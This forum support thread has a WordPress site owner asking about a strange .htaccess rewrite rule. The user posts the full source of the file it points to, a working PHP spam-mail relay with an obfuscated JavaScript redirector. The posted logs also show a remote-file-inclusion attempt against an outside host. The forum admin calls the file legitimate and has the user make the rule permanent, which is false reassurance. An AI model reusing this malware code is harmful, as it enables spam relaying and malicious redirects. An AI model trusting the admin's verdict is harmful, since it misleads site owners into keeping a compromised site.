chairlady-guardhouse.php htaccess RewriteRule

Home Forums BulletProof Security Pro chairlady-guardhouse.php htaccess RewriteRule

This topic contains 10 replies, has 2 voices, and was last updated by  holbrook 1 year, 8 months ago.

Viewing 11 posts - 1 through 11 (of 11 total)
  • Author
    Posts
  • #31135

    holbrook
    Participant

    Hello,

    This code is in my .htaccess file at the top (I have BPS):

    RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L]

    This code has been there since October 8, 2016 (server file date). Is it something to be concerned about? The only thing I recall doing is creating a couple of new users.

    Thank you.

    #31136

    AITpro Admin
    Keymaster

    The RewriteRule says to rewrite this URI:  0608630493 to this URI:  chairlady-guardhouse.php.   Do you recognize this file:  chairlady-guardhouse.php? Are you using any plugins that create htaccess code?

    #31139

    holbrook
    Participant

    I don’t know of any plugins that I have that create htaccess code. Plugins that I use:

    Akismet, BPS, Jetpack, Simple Google Map, Simple Google Sitemap, Weaver II Maintenance, Weaver II Theme Extras. I will continue looking to see if any of these create htaccess code.

    I don’t find in the Log that a plugin was blocked on the day (10/8/2016 10:31 am) this file (chairlady-guardhouse.php) was created. Here are the log entries for that date:

    
    [403 GET Request: October 8, 2016 6:14 am]
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 54.200.203.227
    Host Name: ec2-54-200-203-227.us-west-2.compute.amazonaws.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com
    REQUEST_URI: /wp-login.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
    
    [403 POST Request: October 8, 2016 2:31 pm]
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 195.154.77.147
    Host Name: 195-154-77-147.rev.poneytelecom.eu
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-includes/theme-compat/footer_ver1.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
    REQUEST BODY: --------------------------b28b44e5c0efe2ab
    Content-Disposition: form-data; name="vdpgjkkp"
    
    ==QZjh2bgIyRP90Ti4iIPRUIisTDKUGepR3O
    --------------------------b28b44e5c0efe2ab--
    [403 GET Request: October 8, 2016 3:44 pm]
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 52.43.107.138
    Host Name: ec2-52-43-107-138.us-west-2.compute.amazonaws.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com
    REQUEST_URI: /wp-login.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
    
    [403 GET Request: October 8, 2016 6:22 pm]
    Event Code: PSBR-HPR
    Solution: http://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 178.162.205.5
    Host Name: 178.162.205.5
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-mobile-detector/resize.php?src=http://1268vip.com/wp-content/plugins/juna-it-poll/db.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32
    
    [403 GET Request: October 8, 2016 8:31 pm]
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 54.234.145.122
    Host Name: ec2-54-234-145-122.compute-1.amazonaws.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com
    REQUEST_URI: /wp-login.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
    
    

    Here are the contents of the chairlady-guardhouse.php file:

    <?php
    function base64_url_decode($val) {
        return base64_decode(strtr($val, '-_,', '+/='));
    }
    if(isset($_POST) and count($_POST) > 0){
    	if(isset($_POST["chk"])){
    	    $val = array();
    	    $val["res"] = 1;
    	    print json_encode($val);
    	}else{
    	    $post_data = array_values(array_map('stripslashes', $_POST));
    	    $m_data = explode("|||", base64_url_decode(strrev($post_data[0])));
    	    if(count($m_data) > 1){
    		    $val = array();
    		    if(mail($m_data[0], $m_data[1], $m_data[2], $m_data[3])){
    		        $val["mail"] = 1;
    		    } else{
    		        $val["mail"] = 0;
    		    }
    		    print json_encode($val);
    	    }
        }
    }
    
    if(isset($_GET) and count($_GET) > 0){
        $url = "";
        $redic = array_values($_GET);
        foreach(str_split(base64_url_decode($redic[0])) as $letter){
                if(rand(1,3) == 1){
                        $url .= $letter;
                }else{
                        $url .= $letter."'+'";
                }
        }
    ?>
    <html><head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8">
    <title>Redirecting</title>
    <script>
    var r = '<?php echo $url;?>';
    var _0x485b=["\x72\x65\x70\x6C\x61\x63\x65"];
    </script>
    </head>
    <body onload="location[_0x485b[0]](r);">
    Loading...
    </body></html>
    <?php } ?>
    #31140

    AITpro Admin
    Keymaster

    Where did you find the chairlady-guardhouse.php file?  The code in general is non-malicious, but it would be good to know the origin to confirm the source.

    #31141

    holbrook
    Participant

    The chairlady-guardhouse.php file is in my public_html folder. My public_html folder contains two WP websites. The chairlady-guardhouse.php file is of the type application/x-httpd-php (shown in my File Manager), and the  permissions are 0644. It appears in my file manager right under the .htaccess file.

    #31143

    AITpro Admin
    Keymaster

    The file and htaccess code appear to be legitimate.  So add your htaccess code to this Root Custom Code text box: CUSTOM CODE BOTTOM HOTLINKING/FORBID COMMENT SPAMMERS/BLOCK BOTS/BLOCK IP/REDIRECT CODE, click the Save Root Custom Code button and activate Root folder BulletProof mode.

    #31147

    holbrook
    Participant

    So, I copy everything that is presently in my htaccess file and then paste it into the text box that you specified, is that right? I do this for both of my sites?

    Could you give me a little explanation to help me make sense of what I’m doing here?

    Am I copying the htaccess code from the htaccess file in the BulletProof Security Plugin or from the htaccess code on my server? If it is the one in BPS, which one do I use (secure.htaccess, default.htaccess, etc.)?

    The htaccess file contents that I gave you a couple days ago was from the htaccess file on my server.

    #31151

    AITpro Admin
    Keymaster

    These are the literal steps to add the htaccess code to BPS Custom Code, which saves the htaccess code permanently so that it will always be saved/written/created in your Root htaccess file any time you click the Root Folder BulletProof Mode activate button:

    1. Copy this htaccess code: RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L] to this BPS Root Custom Code text box: CUSTOM CODE BOTTOM HOTLINKING/FORBID COMMENT SPAMMERS/BLOCK BOTS/BLOCK IP/REDIRECT CODE
    2. Click the Save Root Custom Code button.
    3. Go to the Security Modes tab page and click the Root Folder BulletProof Mode activate button.

    #31152

    holbrook
    Participant

    Ok, thank you. Do I then need to delete “RewriteRule ^0608630493/(.*)$ chairlady-guardhouse.php [QSA,L]” from my htaccess file that’s on my server?

    #31153

    AITpro Admin
    Keymaster

    Nope, you do not need to do anything manually with that htaccess code in your Root htaccess file.  When you copy the htaccess code (or any htaccess code) to Custom Code it is saved permanently.  When you click the Root folder BulletProof Mode activate button a new Root htaccess file is created that overwrites your current Root htaccess file.  So the end result is that the htaccess code that you saved in BPS Custom Code is and will always be created in your new Root htaccess file.

    #31154

    holbrook
    Participant

    Ok, all finished with that. Thank you very much!

Viewing 11 posts - 1 through 11 (of 11 total)

You must be logged in to reply to this topic.